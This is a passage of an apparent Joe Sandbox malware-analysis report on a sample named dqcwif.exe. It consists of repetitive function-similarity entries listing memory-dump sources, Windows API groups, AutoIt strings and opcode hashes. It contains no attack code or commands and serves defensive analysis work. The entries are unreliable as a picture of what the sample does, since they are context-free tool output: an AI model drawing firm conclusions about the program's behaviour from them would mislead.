                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 2875609808-0
                                                                                                          • Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                                          • Instruction ID: d7b6483b001a7f09d014b3312d1a874c69f200b94d000cad0fee45ac2eef5cf9
                                                                                                          • Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                                          • Instruction Fuzzy Hash: 3101D610A08B8642EA16572C90605FAF360BFA6F51F044335EA4FA15AADF2CEC858A00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                          • String ID:
                                                                                                          • API String ID: 1539411459-0
                                                                                                          • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                                                          • Instruction ID: 002ad24bc958b2ef48741ae6ecb66b460e063cf3ae31c4a578ef662819147f39
                                                                                                          • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                                                          • Instruction Fuzzy Hash: 55019235A5869142E7404B1AB819BA9AE60BB82F94F284134DF5943BEADF7DDC418B00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 3974789173-0
                                                                                                          • Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                                          • Instruction ID: 689a828a0ef02c3b4e14abfe1dfcbd064e58e859cbfdc689c7651d51215ed150
                                                                                                          • Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                                          • Instruction Fuzzy Hash: 43F06561A9950283FB544F65EC24BE823A0AF5AF85F885035CA0EC22D9DF3C9D898301
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2889604237-0
                                                                                                          • Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                                          • Instruction ID: 73919253b811bcba9eea215387287bf4f91dc6690a6f4813fdf073f238df3be1
                                                                                                          • Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                                          • Instruction Fuzzy Hash: DEE01220A0930686FA109B6A582C6B81254AF46FC1F044030CE0E93BDFDE3C58454700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2889604237-0
                                                                                                          • Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                                          • Instruction ID: a0c90a1adefd989affb95c188d19e7ac551621e2ead22b7c3b396be58b2cfd44
                                                                                                          • Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                                          • Instruction Fuzzy Hash: C3E04820F0934587EB00DB65582C5B811546F46FC1F040030CF0E93BDBDE3D58058700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContainedObject
                                                                                                          • String ID: AutoIt3GUI$Container
                                                                                                          • API String ID: 3565006973-3941886329
                                                                                                          • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                                                          • Instruction ID: 25fdff2cdb7c215a3c0c9af0b126de42a6ae5737e8f6f8de73a1dbb1424f9e75
                                                                                                          • Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                                                          • Instruction Fuzzy Hash: 7C912536604B4682DB24DF29E4A06AD73A4FB89F84F518036DF8D8376AEF39D855C300
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                          • String ID: C:\Users\user\AppData\Roaming\dqcwif.exe
                                                                                                          • API String ID: 3307058713-3141396715
                                                                                                          • Opcode ID: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                                                          • Instruction ID: 1a2078a396deabeabf581ca709dcb86b5574f9793ed7384a5c07abed9673832c
                                                                                                          • Opcode Fuzzy Hash: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                                                          • Instruction Fuzzy Hash: E1418132A0875285E7199F29F8600F967A5FF46F90B544036EB0E9774ADF3CEC828700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                                          • String ID: static
                                                                                                          • API String ID: 3467290483-2160076837
                                                                                                          • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                                          • Instruction ID: 5d6cdbd95c44aae50398d8c8e01bf75887213b3c81b0580cb02a0850a0171cd8
                                                                                                          • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                                          • Instruction Fuzzy Hash: 4C412D325086C287D6709F25E4507EEB7A1FB85B91F104235EBE943A9ADF3CE881CB44
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                          • String ID: 255.255.255.255
                                                                                                          • API String ID: 2496851823-2422070025
                                                                                                          • Opcode ID: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                                                          • Instruction ID: e7c74dc46788f8e191d191073cb3492c4c28ce1b05bef0a436e486ef337049bd
                                                                                                          • Opcode Fuzzy Hash: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                                                          • Instruction Fuzzy Hash: CB31D432A0864281EB20AF2AD4A05FC3760FB56F94F058531DF5D8339AEE7DD846C701
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _snwprintf
                                                                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                          • API String ID: 3988819677-2584243854
                                                                                                          • Opcode ID: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                                                          • Instruction ID: 3918924373b4037bec700d28def6aa21f0dfea89718fa074169f7447ed2c3468
                                                                                                          • Opcode Fuzzy Hash: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                                                          • Instruction Fuzzy Hash: 12315876A08B0695EB10EB69E4A11FC2771FB56B84F504032DB0E97B5ECF78E94AC340
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CreateMessageObjectSendStock
                                                                                                          • String ID: $SysTabControl32
                                                                                                          • API String ID: 2080134422-3143400907
                                                                                                          • Opcode ID: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                                                          • Instruction ID: e96cfe5bb52c9053b5e7e0278e4d7d6dc3c63b7e4dabb21ae053116f28ad70d5
                                                                                                          • Opcode Fuzzy Hash: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                                                          • Instruction Fuzzy Hash: 7C3139325087C18AE760CF19A44479AB7A0F785BA4F144339EBA957AD9CF38D8918F40
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileHandleType
                                                                                                          • String ID: @
                                                                                                          • API String ID: 3000768030-2766056989
                                                                                                          • Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                                                          • Instruction ID: c37695e7c6495bd4cf173a8bd49a7f6be104d61c1680c0f4ab2c6caa4d0fecf0
                                                                                                          • Opcode Fuzzy Hash: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                                                          • Instruction Fuzzy Hash: D521D462A0864245FB688B2DE4B01B82650EB87F74F280335D76E833D9CE39DD81C300
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                          • String ID: static
                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                          • Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                                                          • Instruction ID: 4bf66cd9c7aa7e6b693f378af3d49e7d6507cb23088ceb84bc527244ea159d0a
                                                                                                          • Opcode Fuzzy Hash: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                                                          • Instruction Fuzzy Hash: B1311C36A087818BD764CF29E454B9AB7A5F789B50F104239DB9D43B99DF38E851CF00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                          • String ID: Combobox
                                                                                                          • API String ID: 1025951953-2096851135
                                                                                                          • Opcode ID: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                                                          • Instruction ID: e0a666ac00919e2545acef07fcbec6f1a3ee77529c5c1e02efe4e311e8c56d46
                                                                                                          • Opcode Fuzzy Hash: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                                                          • Instruction Fuzzy Hash: B73107326087818AE7708F59A454B9AB7A1F785B90F504239EBA943B9ACF3DD845CF00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                                          • String ID: edit
                                                                                                          • API String ID: 2978978980-2167791130
                                                                                                          • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                                                          • Instruction ID: bb2f9c207ec6dd00216a2541d078d2592a1bd009cda07128908f5bac3f591b8f
                                                                                                          • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                                                          • Instruction Fuzzy Hash: FC31FA36A08781CAE760CB19A45479AB7A1F785B90F144235EBA883B9DDF3CD885CF05
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _handle_error
                                                                                                          • String ID: "$pow
                                                                                                          • API String ID: 1757819995-713443511
                                                                                                          • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                                          • Instruction ID: 05cfe6405998414d9a99930e4a19fd8b25adac252bf7364a3d0461db9177d7e0
                                                                                                          • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                                          • Instruction Fuzzy Hash: D3217EB2D1CAC583D370CF14F0546AAEAA1FBDA744F202325FB894695ACFBDD4819B00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 3678867486-1403004172
                                                                                                          • Opcode ID: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                                          • Instruction ID: a23f0d85d87c73aeb1bf8882398ec3a88d5b3c8c01289d32ff2033c5ba1c3d0b
                                                                                                          • Opcode Fuzzy Hash: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                                          • Instruction Fuzzy Hash: EF11D262A08B8191FA10DB19D4611E923A1FB9AFA0F445231DBAC877DFDF3CE909C750
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 3678867486-1403004172
                                                                                                          • Opcode ID: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                                          • Instruction ID: 13bc7a9b5e3f4f1b595f6704da1afec64d555d46248adafad33eda585be19bb7
                                                                                                          • Opcode Fuzzy Hash: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                                          • Instruction Fuzzy Hash: 36119361A0868692FA10D714E4611FA5750BF96B80F445131D78D8768FDE2CDA058B10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
